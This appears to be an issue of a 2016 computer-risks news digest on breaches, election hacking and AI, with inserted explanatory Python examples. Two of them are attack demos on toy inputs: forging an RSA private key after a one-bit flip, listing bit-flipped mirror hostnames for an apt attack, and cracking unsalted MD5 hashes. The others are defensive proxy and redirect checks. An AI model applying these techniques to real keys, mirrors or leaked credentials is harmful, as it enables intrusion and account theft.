Casey A. Klofstad, Stephen Nowicki and Rindy C. Anderson, How Voice Pitch Influences Our Choice of Leaders, *American Scientist*, September-October 2016, pages 282--287

When candidates speak, their vocal characteristics -- as well as their words -- influence voters' attitudes toward them.

Boxed summaries:
* Research subjects, both male and female, preferred a lower-pitched voice, whether the candidate was female or male.
* Does the language-processing circuitry of the human brain deal with meaning apart from intonation?

Fascinating article. PGN
Michael Kan, Computerworld, 30 Aug 2016 In June, attackers managed to steal administrative login credentials from a county official in the U.S. http://www.computerworld.com/article/3113707/security/hackers-had-a-chance-to-hamper-voting-by-deleting-records.html opening text: A U.S. cybersecurity monitor on Monday described another breach of a voter election system just after a leaked FBI report revealed two similar attacks. In June, anonymous hackers stole administrative login credentials in an unnamed county that would have let them delete voter registration records and prevent citizens from casting ballots. http://www.cso.com.au/article/605914/hackers-had-chance-hamper-voting-by-deleting-records/
Dan Lieberman and Russ Finkelstein, Fusion.net, 31 Aug 2016 This item from Fusion TV (with a short news clip) on hackable touchscreen voting machines reminds us why optical-scan paper ballots seem much better. It also notes Andrew Appel hacking into a paperless touch-screen voting machine in seven minutes. http://fusion.net/story/342741/hacking-electronic-voting-machines-election-2016/
http://cyberattacksquad.com/icit-analysis-hacking-elections-is-easy-part-one-tactics-techniques-and-procedures/
Did you know that
* Only 1 out of the top 20 U.S. banks has an 'A' grade in cybersecurity?
* 75% of the top 20 U.S. commercial banks are afflicted with malware?
http://info.securityscorecard.com/2016-financial-cybersecurity-report (Registration required)

Security Scorecard analyzed 7,111 U.S. financial institutions to find the most critical vulnerabilities and security weaknesses within investment banks, asset management firms, and major commercial banks in the United States.
[Note: This item comes from friend Gary Rimar. DLH] <via Geoff Goodfellow as well. PGN>

New hacking technique stealthily changes memory of virtual servers, 12 Aug 2016
<http://www.homelandsecuritynewswire.com/dr20160812-new-hacking-technique-stealthily-changes-memory-of-virtual-servers>

For the first time ever, a team of Dutch hacking experts managed to alter the memory of virtual machines in the cloud without a software bug, using a new attack technique. With this technique an attacker can crack the keys of secured virtual machines or install malware without it being noticed. It is a new de-duplication-based attack in which data can not only be viewed and leaked, but also modified using a hardware glitch. By doing so the attacker can order the server to install malicious and unwanted software or allow logins by unauthorized persons.

De-duplication and Rowhammer bug

VUA notes that with the new attack technique Flip Feng Shui (FFS), an attacker rents a virtual machine on the same host as the victim. This can be done by renting many virtual machines until one of them lands next to the victim. A virtual machine in the cloud is often used to run applications, test new software, or run a Web site. There are public (for everyone), community (for a select group), and private (accessible to one organization) clouds.

The attacker writes a memory page that he knows exists in the victim on the vulnerable memory location and lets it de-duplicate. As a result, the identical pages will be merged into one in order to save space (the information is, after all, the same). That page is stored in the same part of the memory of the physical computer. The attacker can now modify the information in the general memory of the computer. This can be done by triggering a hardware bug dubbed Rowhammer, which flips bits from 0 to 1 or vice versa in the vulnerable memory cells.
Cracking OpenSSH

The researchers of the Vrije Universiteit Amsterdam, who worked together with a researcher from the Catholic University of Leuven, describe in their research two attacks on the operating systems Debian and Ubuntu. The first FFS attack gained access to the virtual machines by weakening OpenSSH public keys. The attacker did this by changing one bit of the victim's public key. In the second attack, the settings of the software management application apt were adjusted by making minor changes to the URL from which apt downloads software. The server could then install malware that presents itself as a software update. The integrity check could be circumvented by making a small change to the public key that verifies the integrity of the apt-get software packages. [...]
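Why one flipped bit is enough, as an added example (this is not code from the VU Amsterdam / KU Leuven researchers, and it also covers the Ars Technica item on the same attack later in this issue). Part 1 takes a toy RSA modulus n = p*q, flips a single bit, factors the corrupted n' (which is almost never a product of two large primes any more) and derives a private exponent that the corrupted public key accepts; that is the OpenSSH half of the attack. Part 2 lists the hostnames one bit away from an apt mirror name, the sibling names an attacker would register before flipping the bit in the victim's sources.list. The primes, exponent and hostname are constructed for the demo, and the hardware side (page de-duplication and hammering) is not reproduced:

```python
"""Flip Feng Shui, software half only: one bit flip in a public key or a
mirror hostname. Toy-sized, constructed inputs; not the researchers' code."""
import math
import random
import string

# Constructed toy key: real keys use 1024-bit primes, 20-bit ones factor instantly.
P, Q, E = 1000003, 1000033, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))

_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)  # deterministic for n < 3.3e24


def is_prime(n):
    """Deterministic Miller-Rabin for the sizes used here."""
    if n < 2:
        return False
    for p in _MR_BASES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def pollard_rho(n, rng):
    """A non-trivial factor of composite n (Floyd cycle finding)."""
    if n % 2 == 0:
        return 2
    while True:
        c, x = rng.randrange(1, n), rng.randrange(0, n)
        y, d = x, 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:
            return d


def factor(n, rng=None):
    """Prime factors of n with multiplicity, sorted (fixed seed: reproducible)."""
    rng = rng or random.Random(1)
    if n == 1:
        return []
    if is_prime(n):
        return [n]
    d = pollard_rho(n, rng)
    return sorted(factor(d, rng) + factor(n // d, rng))


def private_exponent_for(n_corrupt, e):
    """d' with e*d' == 1 mod phi(n'), or None when e divides phi(n') (flip unusable)."""
    fs = factor(n_corrupt)
    phi = 1
    for p in set(fs):
        phi *= (p - 1) * p ** (fs.count(p) - 1)
    if math.gcd(e, phi) != 1:
        return None
    return pow(e, -1, phi)


def find_usable_flip(n=N, e=E):
    """Lowest bit position whose flip yields a modulus the attacker can own."""
    for bit in range(n.bit_length()):
        n2 = n ^ (1 << bit)
        d2 = private_exponent_for(n2, e)
        if d2 is not None:
            return bit, n2, d2
    return None


def key_matches(m, e, d, n):
    """True if signing m with d verifies under the public key (n, e)."""
    return pow(pow(m, d, n), e, n) == m % n


def run_attack(n=N, e=E):
    """Flip a bit of n, own the result, and prove the forged key verifies."""
    bit, n2, d2 = find_usable_flip(n, e)
    m = next(x for x in range(2, n2) if math.gcd(x, n2) == 1)  # any message coprime to n'
    return {"bit": bit, "corrupt_n": n2, "factors": factor(n2),
            "forged_ok": key_matches(m, e, d2, n2)}


_DNS_OK = set(string.ascii_lowercase + string.digits + "-")


def single_bit_flip_hostnames(host):
    """Hostnames differing from host in exactly one bit that are still valid,
    lowercase DNS names. Dots are skipped: flipping one breaks the label
    structure instead of landing on a registrable sibling name."""
    out = []
    for i, ch in enumerate(host):
        if ch == ".":
            continue
        for b in range(7):  # printable ASCII lives in the low 7 bits
            c2 = chr(ord(ch) ^ (1 << b))
            if c2 in _DNS_OK:
                out.append(host[:i] + c2 + host[i + 1:])
    return out
```

`run_attack()` reports which bit was flipped, the factorisation of the corrupted modulus and that the attacker's derived private exponent round-trips under it; `single_bit_flip_hostnames("mirror.example")` is the registration shopping list for the apt variant. The defence the paper's setting lacks is on the hardware and hypervisor side (ECC memory, disabling cross-VM page de-duplication), not in the key format.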
Not quite clear how this happened, but cellphone locations are suspected. http://fusion.net/story/339018/facebook-psychiatrist-privacy-problems/
[via NNSquad] http://www.cso.com.au/article/606069/staff-breach-onelogin-exposes-password-storage-feature/ Several thousand enterprise customers, including high profile tech startups, use OneLogin for single sign-on to access enterprise cloud applications. The company has championed the SAML standard for single sign-on and promises customers an easy way to enable multi-factor authentication from devices to cloud applications. But it appears the company wasn't using multi-factor authentication for its own systems.
http://www.nytimes.com/reuters/2016/08/30/business/30reuters-cyber-heist-swift.html SWIFT disclosed new hacking attacks on its member banks, on the heels of February's high-profile $81 million heist at Bangladesh Bank.
Dropbox hack leads to leaking of 68m user passwords on The Internet Data stolen in 2012 breach, containing encrypted passwords and details of around two-thirds of cloud firm's customers, has been leaked. https://www.theguardian.com/technology/2016/aug/31/dropbox-hack-passwords-68m-data-breach [This is just coming out now? The hack occurred four years ago, in 2012. Their advice: change your password! <So it can be hacked anew -- assuming the vulnerabilities still exist?> PGN]
TechCrunch.com, 1 Sep 2016. This hack occurred in March 2012, according to LeakedSource, "MD5 is seriously out of style. ... Moreover, Last.fm didn't use salt in its hashing process." https://techcrunch.com/2016/09/01/43-million-passwords-hacked-in-last-fm-breach/ "For the second time this week, our advice is that you change your password immediately... The most popular password pulled from the Last.fm database was 123456. Seriously, it's 2016 people—use a platform like LastPass to generate randomized, complex passwords that are unique to every service for which you sign up." [This is just coming out now? The hack occurred four years ago, in 2012. Their advice: change your password! <So it can be hacked anew -- assuming the vulnerabilities still exist?> PGN]
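What "unsalted MD5" costs the victims in practice, as an added example (not Last.fm's code or TechCrunch's). A constructed three-user table and a five-word list stand in for the dump: with unsalted MD5, one hash per candidate word is computed once and matched against every user, and two users who picked 123456 are visibly the same; with a per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256 here) the attacker must re-run the KDF for each user and each candidate, and identical passwords no longer share a hash. The round count is kept low for the demo; production deployments use far more:

```python
"""Unsalted MD5 versus salted PBKDF2 on a constructed toy credential dump."""
import hashlib
import os

# Constructed toy user table: two users chose the same weak password.
USERS = {"alice": "123456", "bob": "123456", "carol": "xK9#pL2vQ8mW"}
WORDLIST = ["password", "123456", "qwerty", "letmein", "iloveyou"]
PBKDF2_ROUNDS = 50_000  # deliberately low for the demo; real deployments go much higher


def md5_unsalted(password):
    return hashlib.md5(password.encode()).hexdigest()


def leak_unsalted(users=USERS):
    """What an attacker obtains from an unsalted-MD5 user table."""
    return {u: md5_unsalted(p) for u, p in users.items()}


def crack_unsalted(leak, wordlist=WORDLIST):
    """One hash per candidate serves every user at once (a lookup table), so the
    work is len(wordlist) regardless of how many accounts leaked."""
    table = {md5_unsalted(w): w for w in wordlist}
    found = {u: table[h] for u, h in leak.items() if h in table}
    return found, len(table)


def pbkdf2_salted(password, salt, rounds=PBKDF2_ROUNDS):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()


def leak_salted(users=USERS):
    """Per-user random salt stored beside the hash; the salt is not secret."""
    leak = {}
    for u, p in users.items():
        salt = os.urandom(16)
        leak[u] = (salt, pbkdf2_salted(p, salt))
    return leak


def crack_salted(leak, wordlist=WORDLIST):
    """No shared table: each (user, candidate) pair costs a full KDF run."""
    found, work = {}, 0
    for u, (salt, h) in leak.items():
        for w in wordlist:
            work += 1
            if pbkdf2_salted(w, salt) == h:
                found[u] = w
                break
    return found, work
```

Both crackers still recover 123456 for alice and bob: salting does not rescue a weak password, it removes the bulk discount. The difference shows up in the work counter (5 MD5 calls for the whole unsalted table versus 9 PBKDF2 runs for the salted one, each of which is tens of thousands of times slower) and in the fact that alice's and bob's salted hashes differ, so the dump no longer reveals who shares a password.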
https://haveibeenpwned.com [As I am typing this, their website shows 129 websites and 1,388,845,883 accounts that have been pwned! PGN]
Danny Palmer, ZDnet, 2 Sep 2016 Not content with stealing your bank details, Betabot will also infect your computer with Cerber ransomware too. http://www.zdnet.com/article/this-data-stealing-trojan-malware-is-the-first-to-also-infect-you-with-ransomware/
http://arstechnica.com/security/2016/08/new-attack-steals-private-crypto-keys-by-corrupting-data-in-computer-memory/
Kimpton Hotels & Restaurants Notifies Customers of Payment Card Incident https://www.kimptonhotels.com/promos/payment-card-notification
Lucian Constantin, PC World, 30 Aug 2016 The new attack uses Word documents loaded with malicious code http://www.pcworld.com/article/3114066/security/attackers-deploy-rogue-proxies-on-computers-to-hijack-https-traffic.html opening text: Security researchers have highlighted in recent months how the web proxy configuration in browsers and operating systems can be abused to steal sensitive user data. It seems that attackers are catching on. A new attack spotted and analyzed by malware researchers from Microsoft uses Word documents with malicious code that doesn't install traditional malware, but instead configures browsers to use a web proxy controlled by attackers.
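Because the attack described above installs no conventional malware, the artefact to hunt for is the proxy configuration itself. As an added example (not Microsoft's analysis tooling), the following audits a Windows user's WinINet proxy settings from a `reg export` of `HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings` and flags a `ProxyServer` or PAC (`AutoConfigURL`) host that is not on an allowlist. The value names are the standard WinINet ones; the export text, the allowlist and the 203.0.113.10 address (a documentation range) are constructed:

```python
"""Flag rogue proxy / PAC settings in a constructed Windows .reg export."""
import re
from urllib.parse import urlparse

KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
ALLOWED_PROXY_HOSTS = {"proxy.corp.example"}  # constructed: the org's real proxies

# Constructed export of a machine hit by the Word-document attack (no malware,
# just a proxy pointing at an attacker-controlled host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="203.0.113.10:8080"
"AutoConfigURL"="http://203.0.113.10/wpad.dat"
'''


def parse_reg(text):
    """Minimal .reg parser: {key_path: {value_name: value}} for string and dword values."""
    out, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            out.setdefault(current, {})
            continue
        m = re.fullmatch(r'"([^"]+)"=(.+)', line)
        if m and current is not None:
            name, raw = m.groups()
            if raw.startswith("dword:"):
                out[current][name] = int(raw[6:], 16)
            elif raw.startswith('"') and raw.endswith('"'):
                out[current][name] = raw[1:-1].replace("\\\\", "\\")
    return out


def proxy_findings(reg, allowed=ALLOWED_PROXY_HOSTS):
    """Human-readable findings for proxy settings that leave the allowlist."""
    vals = reg.get(KEY, {})
    findings = []
    if vals.get("ProxyEnable") == 1:
        # ProxyServer is "host:port" or "http=host:port;https=host:port;..."
        for entry in vals.get("ProxyServer", "").split(";"):
            hostport = entry.split("=", 1)[-1]
            host = hostport.rsplit(":", 1)[0]
            if host and host not in allowed:
                findings.append(f"ProxyServer points at unapproved host {host}")
    pac = vals.get("AutoConfigURL")
    if pac:
        host = urlparse(pac).hostname or ""
        if host not in allowed:
            findings.append(f"AutoConfigURL fetches a PAC script from unapproved host {host}")
    return findings
```

Run over a fleet, the same check should also cover the per-connection `DefaultConnectionSettings` blob and any non-default WinHTTP proxy, which this minimal parser does not decode. A PAC script is the more interesting finding of the two, since it can be written to proxy only the sites the attacker cares about and leave everything else direct, which is why a spot check in the browser can look clean.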
Zack Whittaker for Zero Day, ZDnet, 29 Aug 2016 The denial-of-service flaws could be used to install malware. http://www.zdnet.com/article/kaspersky-fixes-antivirus-crash-bug/
Zack Whittaker for Zero Day, ZDnet, 30 Aug 2016 The company said the possible security issue is limited to Google domains. http://www.zdnet.com/article/google-wont-fix-login-page-flaw-can-lead-to-malware-download/ selected text: Google has said it will not fix a potential security flaw that could trick a user into downloading malware from its login window. But Google said that the redirect page has to fall within "*google.com" domains, limiting its impact. The problem, said Woods, is that malware hosted on "drive.google.com" or "docs.google.com" which fall within the Google subdomain parameters could still be used to serve up malware, and hide it as a genuine Google login page.
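The point Woods makes is a general one about post-login redirect validation: a rule of the form "any host under google.com" still admits subdomains that serve user-uploaded content. As an added example (not Google's code), the following contrasts that wildcard rule with an exact-host allowlist and a couple of the usual URL-parsing traps. The parameter name and the allowlist are assumptions; the hostnames are the ones named in the article:

```python
"""Post-login redirect target validation: wildcard suffix vs exact allowlist."""
from urllib.parse import urlparse

SUFFIX_ALLOWED = ".google.com"  # the loose rule the article describes
EXACT_ALLOWED = {"accounts.google.com", "mail.google.com"}  # constructed strict list


def _host(url):
    return (urlparse(url).hostname or "").lower()


def wildcard_ok(url):
    """Loose check: https and the host is google.com or any subdomain of it.
    This admits drive.google.com / docs.google.com, where anyone can host a file."""
    u = urlparse(url)
    host = _host(url)
    return u.scheme == "https" and (host == "google.com" or host.endswith(SUFFIX_ALLOWED))


def strict_ok(url, allowed=EXACT_ALLOWED):
    """Strict check: https, no embedded credentials, host exactly on the allowlist."""
    u = urlparse(url)
    return u.scheme == "https" and u.username is None and _host(url) in allowed


def classify(url):
    """Both verdicts side by side for a candidate redirect target."""
    return {"wildcard": wildcard_ok(url), "strict": strict_ok(url)}
```

Both checks use the parsed hostname rather than a string prefix, so `https://google.com.evil.example/` and `https://accounts.google.com@evil.example/` fail either way; the difference is that only the strict list refuses the user-content subdomains. Where a product must redirect to many hosts, the usual fix is to redirect to a fixed internal path and let that page forward to a server-side allowlisted destination, rather than widen the suffix rule.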
So much for counter-phishing training: Half of people click anything sent to them. http://arstechnica.com/security/2016/08/researchers-demonstrate-half-of-people-will-click-on-any-link-theyre-sent/
Aimee Chanthadavong, ZDnet 2 Sep 2016 A 30-year-old Perth constable will remain on duty, despite being charged for allegedly accessing a restricted computer. http://www.zdnet.com/article/perth-cop-accessed-restricted-computer/ [There is more in the article than the title and blurb imply.] Final paragraph: In a recent report by the Queensland CCC [Crime and Corruption Commission], it revealed the Queensland Police made up 67 percent of the around 400 allegations of information misuse in the state during 2014-15.
Peter Sayer, Computerworld, 30 Aug 2016 Apple must repay up to the equivalent of US$14.5 billion in underpaid taxes in Ireland, the European Commission ruled on 30 Aug 2016. Two Irish tax rulings constituted illegal state aid, the European Commission ruled. http://www.computerworld.com/article/3113753/it-industry/apple-must-repay-145-billion-in-underpaid-taxes-in-ireland.html selected text [PGN-ed]: Apple's tax benefits in Ireland are illegal, and the company will have to pay up to the equivalent of roughly US$14.5 billion in back taxes, plus interest. The investigation found that Apple's effective tax rate on profit reported in Ireland was just 1/2000, falling to 1/20000 in 2014. Apple and the Irish tax authority disputed the commission's charges. Vestager said that Irish tax authorities had allowed Apple to split profit from the two companies, which were subject to normal taxes, with "head office" companies that were subject to no taxes, either in Ireland or elsewhere. "Splitting the profits did not have any factual or economic justification. The so-called head office had no employees, no premises, no real activities," she said. Those head-office companies were allocated almost all the profits. This selective tax treatment in Ireland is illegal under European Union state aid rules, she said, and distorts competition.
John Markoff, *The New York Times*, 1 Sep 2016 [in the 2 Sep paper], via ACM TechNews, Friday, September 2, 2016 Researchers from Alphabet, Amazon, Facebook, IBM, and Microsoft are forming an alliance to establish an ethical standard for artificial intelligence (AI) development. Four people involved in the alliance's foundation say the group's intent is to make sure AI research is focused on societal benefits and not harm. One of the group's executives, Microsoft researcher Eric Horvitz, recipient of the 2015 ACM AAAI Allen Newell Award, sponsors a Stanford University group that on Thursday issued a report underscoring the value of the industry effort. The report's authors warn it will be impossible to regulate AI, "since there is no clear definition of AI (it isn't any one thing), and the risks and considerations are very different in different domains." Study co-author and University of Texas at Austin researcher Peter Stone recommends boosting awareness of and expertise about AI at all levels of government. Both the AI industry group and a proposed initiative at the Massachusetts Institute of Technology (MIT) seek to investigate AI's social and economic implications, with the latter discussing the design of new AI and robotic systems with "society in the loop." "What we want to do is support and reinforce the social scientists who are doing research which will play a role in setting policies," says MIT Media Lab director Joichi Ito. http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1104cx2fb31x072199&
Casey Baseel, RocketNews24, 29 Aug 2016 http://en.rocketnews24.com/2016/08/28/kawasaki-developing-ai-motorcycles-that-can-talk-with-learn-from-their-riders/ selected text: Through continued communication, the bike will learn the owner's amount of motorcycle experience, skill level, and individual riding style. But what's likely to have a more direct effect on the riding experience is a planned feature in which after developing a profile of the rider, various vehicle settings will automatically be adjusted accordingly. [While there are advantages, what happens if someone borrows a configured bike?]
Last Wednesday, Starwood's tech-centric hotel brand, Aloft, unveiled its top-secret [*] Project Jetson. Now, for the first time, hotel guests can talk to their rooms, thanks to the help of Apple's ubiquitous voice-powered assistant, Siri. http://www.bloomberg.com/Research/stocks/private/snapshot.asp?privcapid=7685157

"Siri, raise the temperature to 68 degrees," or "Siri, turn out the bathroom light," a guest might say -- if they were staying at Aloft's Boston Seaport location, where Project Jetson is currently piloting, or Santa Clara. http://www.starwoodhotels.com/alofthotels/property/overview/index.html?propertyID=4142&language=en_US http://www.aloftsantaclara.com/

Depending on your outlook regarding hospitality, that may seem unnecessary or frivolous—or scarily futuristic. But maybe you've already learned first-hand that when most of these functions are embedded on bedside tablet devices, they quickly get buggy with age. Or maybe you've gotten into a tightly tucked bed after a long day of meetings, only to find that a light is still on and there's no way to turn it off remotely. Then you know that Project Jetson isn't just about technology for technology's sake; it's about making your hotel room more intuitive.

I hope it's more deterministic than my car's voice control, which only selectively understands my verbal commands. On a good day I can change radio stations or turn on the rear window defroster. On a bad day, anything I haven't requested can happen. I can't wait to experience that suspense and excitement in a voice-controlled self-driving car. Or even a hotel room.

Plus, of course—the walls will always be listening. I had that experience recently—ending a phone call, iPad across the room. I said "Thanks for your help" and the iPad responded politely with something like "You're welcome". I'm sure Project Jetson will archive/analyze what it hears purely for analysis and improvement and will maintain complete confidentiality.
The fact that "privacy" doesn't appear in the article must be just an oversight. Gabriel Goldberg, Computers and Publishing, Inc. gabe@gabegold.com 3401 Silver Maple Place, Falls Church, VA 22042 (703) 204-0433 [* top-secret Project Jetson unveiled? Maybe, certainly not Top Secret, and actually not very secret at all. PGN]
Amy Golod, *U.S. News and World Report*, 31 Aug 2016, via ACM TechNews, Friday, September 2, 2016 The College Board's new advanced placement (AP) Computer Science Principles course will introduce computer science and programming fundamentals to U.S. high school students, with a focus on collaboration and creativity. Unlike the existing AP Computer Science A course, the new course will not require previous knowledge of programming languages and technology, and it is aimed at making computing accessible to underrepresented demographics. Students will be exposed to a variety of applications and programming languages through project-based learning. In addition to algorithms and programming, the course will concentrate on the global effects of computing and the ethical usage of data. "We're focusing not just on the knowledge we want students to have, but the practices and experiences we want them to have before they leave the course," says the College Board's Richard Kick. Now that a three-year pilot program has concluded, Computer Science Principles will launch in the fall and consist of two projects and a final exam. For one project, students will use a digital medium to explain the development of a computer science application; for the second project, students will build an app using a programming language of their choice. The project-based approach is intended to engage classes filled with students who have varying levels of programming experience. http://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-1104cx2fb36x072199&
If you delete your cookies and Internet history, are you willfully destroying material evidence?
* Betsy Feist alleges Paxfire intentionally intercepted her communications in violation of the Wiretap Act.
* Paxfire claims she cleared her Internet history, which would have allowed them to refute her allegations.
* Feist argues that Paxfire does not need her Internet history to defend against the allegations because this action is about Paxfire's policies and practices, not merely specific instances of interception and redirection.

Ronald L. Ellis, U.S. Magistrate Judge, delivered a somewhat Solomonic mixed ruling: Paxfire's motion is Granted in Part and Denied in Part. Case 1:11-cv-05436-LGS-RLE [Starkly PGN-ed] Thanks to Andrew Grosso for noting this case.
Choice Hotels (www.choicehotels.com) is using some of the more advanced CAPTCHAs - e.g., "which of these pictures has a house number". Today I've run into a new version which has me completely stumped - a large image broken into squares, and the question "which of these blocks has a street sign". The street signs are frequently split across multiple blocks, and they're not necessarily American or international standards (e.g., one had signs in Chinese, but I don't know if those are street signs). So I'm in the position of trying to figure out what an image recognition system thinks is a street sign - e.g., is a small street sign at an oblique angle something it will recognize? What if it's the name of a street where some of the letters are in one block and others in another? How about a vertical sign that spans several blocks, where the bottom part of the sign is just a solid color - does that count? I've encountered all of these and many more edge cases in the past few minutes. After about 10 tries, I have been unsuccessful at getting logged in. I wonder if they track the failure rate? The RISK is that a clever algorithm (in this case image recognition) that a human is presumed to be able to understand (but a computerized system is not) may be too smart for its own good.
On July 29, President Obama signed bill S.764 into law, dealing a major blow to the movement to require GMO labeling. The new law, which food safety groups call the "Deny Americans the Right to Know" (DARK) Act, has at least three key parts that undermine Vermont's popular GMO labeling bill and make it nearly impossible for Americans to know what's in their food. [...] In the early 1990s, a European genetic engineering company was preparing to field test its genetically modified version of /Klebsiella planticola/, which it had tested in the lab and presumed to be safe. But if it weren't for the work of a team of independent scientists led by Elaine Ingham, that company could have literally killed every terrestrial plant on the planet. http://www.alternet.org/food/how-one-gmo-nearly-took-down-planet Extreme? Exaggerated? Valid? Can't tell. But legislating against providing information seems inherently suspicious behavior. Right up there with "Nothing to see here, move along."
Google Maps' de-emphasis of streets is (in my opinion) an improvement for users traveling rural roads, where road condition is crucial. Their previous presentation often showed "roads" which were nothing more than two tire tracks through a grassy field. Even in satellite view, their previous intense white lines often hid the actual condition of the road from view.